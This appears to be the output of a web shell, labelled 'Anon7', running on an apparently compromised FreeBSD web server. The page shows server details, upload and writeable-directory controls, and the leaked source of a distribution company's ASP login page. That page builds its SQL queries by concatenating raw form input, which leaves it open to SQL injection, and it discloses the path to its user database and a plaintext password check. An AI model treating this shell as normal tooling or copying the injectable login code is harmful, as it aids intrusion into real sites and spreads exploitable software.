KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/windsorweb/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/windsorweb/login.asp
<%
Response.Expires = -1000 'Makes the browser not cache this page
Response.Buffer = True 'Buffers the content so our Response.Redirect will work

Dim Error_Msg

login = Request.Form("login")
If login = "login_again" Then
    Session("UserLoggedIn") = ""
    ShowLogin
Else
    If Session("UserLoggedIn") = "true" Then
        AlreadyLoggedIn
    Else 
        If login = "true" Then
            CheckLogin
        Else
            ShowLogin
        End If
    End If
End If

Sub ShowLogin 
Response.Write(Error_Msg & "<br>")

%>
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<link rel="File-List" href="login_files/filelist.xml">

<title>Windsor Distribution User Login </title>
<!--[if !mso]>
<style>
v\:*         { behavior: url(#default#VML) }
o\:*         { behavior: url(#default#VML) }
.shape       { behavior: url(#default#VML) }
</style>
<![endif]--><!--[if gte mso 9]>
<xml><o:shapedefaults v:ext="edit" spidmax="1027"/>
</xml><![endif]-->
</head>

<body>

<form name="form1" action="login.asp" method="post">
  <input type="hidden" name="login" value="true"><p align="center"><!--[if gte vml 1]><v:shapetype id="_x0000_t136"
 coordsize="21600,21600" o:spt="136" adj="10800" path="m@7,l@8,m@5,21600l@6,21600e">
 <v:formulas>
  <v:f eqn="sum #0 0 10800"/>
  <v:f eqn="prod #0 2 1"/>
  <v:f eqn="sum 21600 0 @1"/>
  <v:f eqn="sum 0 0 @2"/>
  <v:f eqn="sum 21600 0 @3"/>
  <v:f eqn="if @0 @3 0"/>
  <v:f eqn="if @0 21600 @1"/>
  <v:f eqn="if @0 0 @2"/>
  <v:f eqn="if @0 @4 21600"/>
  <v:f eqn="mid @5 @6"/>
  <v:f eqn="mid @8 @5"/>
  <v:f eqn="mid @7 @8"/>
  <v:f eqn="mid @6 @7"/>
  <v:f eqn="sum @6 0 @5"/>
 </v:formulas>
 <v:path textpathok="t" o:connecttype="custom" o:connectlocs="@9,0;@10,10800;@11,21600;@12,10800"
  o:connectangles="270,180,90,0"/>
 <v:textpath on="t" fitshape="t"/>
 <v:handles>
  <v:h position="#0,bottomRight" xrange="6629,14971"/>
 </v:handles>
 <o:lock v:ext="edit" text="t" shapetype="t"/>
</v:shapetype><v:shape id="_x0000_s1025" type="#_x0000_t136" alt="Windsor Distribution"
 style='width:398.25pt;height:51pt' fillcolor="blue">
 <v:fill color2="silver" rotate="t" angle="-90" focusposition=".5,.5"
  focussize="" focus="100%" type="gradient"/>
 <v:shadow on="t" opacity="52429f"/>
 <v:textpath style='font-family:"Arial Black";font-style:italic;v-text-kern:t'
  trim="t" fitpath="t" string="Windsor Distribution"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=536 height=73
src="login_files/image001.gif" alt="Windsor Distribution" v:shapes="_x0000_s1025"><![endif]></p>
  <p align="center"><big><font color="#0000FF"><strong>Windsor
  Distribution Delivery Database:</strong></font></big></p>
  <p align="center"><strong><big>User Name:</big>&nbsp; <input type="text" name="username" size="20"><br>
  <big>Password :&nbsp;&nbsp;</big> <input type="password" name="userpwd" size="20"></strong><br>
  <input type="submit" value="Login"> </p>
</form>
<% 
End Sub

Sub AlreadyLoggedIn
%>

<p>You are already logged in. Do you want to logout or login as a different user? </p>

<form name="form2" action="login.asp" method="post">
  <input type="hidden" name="login" value="login_again"><p><input type="submit"
  name="button1" value="Yes"> </p>
</form>
<%
End Sub

Sub CheckLogin
Dim Conn, cStr, sql, RS, username, userpwd
username = Request.Form("username")
userpwd = Request.Form("userpwd")
Set Conn = Server.CreateObject("ADODB.Connection")
cStr = "DRIVER={Microsoft Access Driver (*.mdb)};"
cStr = cStr & "DBQ=" & Server.MapPath("search\users.mdb") & ";"
Conn.Open(cStr)
sql = "select username from USER where USERNAME = '" & LCase(username) & "'"
sql = sql & " and PASSWORD = '" & LCase(userpwd) & "'"
sql = sql & " and PACKFURN = 1"
sql = sql & " and ACCLEVEL = 1"
Set RS = Conn.Execute(sql)
If RS.BOF And RS.EOF Then
Else
    Session("UserLoggedIn") = "true"
    Response.Redirect "packsearchpro.asp"
End If
sql = "select username from USER where USERNAME = '" & LCase(username) & "'"
sql = sql & " and PASSWORD = '" & LCase(userpwd) & "'"
sql = sql & " and PACKFURN = 1"
sql = sql & " and ACCLEVEL = 0"
Set RS = Conn.Execute(sql)
If RS.BOF And RS.EOF Then
Else
    Session("UserLoggedIn") = "true"
    Response.Redirect "packsearch.asp"
End If
sql = "select username from USER where USERNAME = '" & LCase(username) & "'"
sql = sql & " and PASSWORD = '" & LCase(userpwd) & "'"
sql = sql & " and PACKFURN = 2"
sql = sql & " and ACCLEVEL = 2"
Set RS = Conn.Execute(sql)
If RS.BOF And RS.EOF Then
Else
    Session("UserLoggedIn") = "true"
    Response.Redirect "packsearch2.asp"
End If
sql = "select username from USER where USERNAME = '" & LCase(username) & "'"
sql = sql & " and PASSWORD = '" & LCase(userpwd) & "'"
sql = sql & " and SCREENNUM = 5"
Set RS = Conn.Execute(sql)
If RS.BOF And RS.EOF Then
Else
    Session("UserLoggedIn") = "true"
    Response.Redirect "packsearch5.asp"
End If
End Sub
%>
</body>
</html>

Anon7 - 2021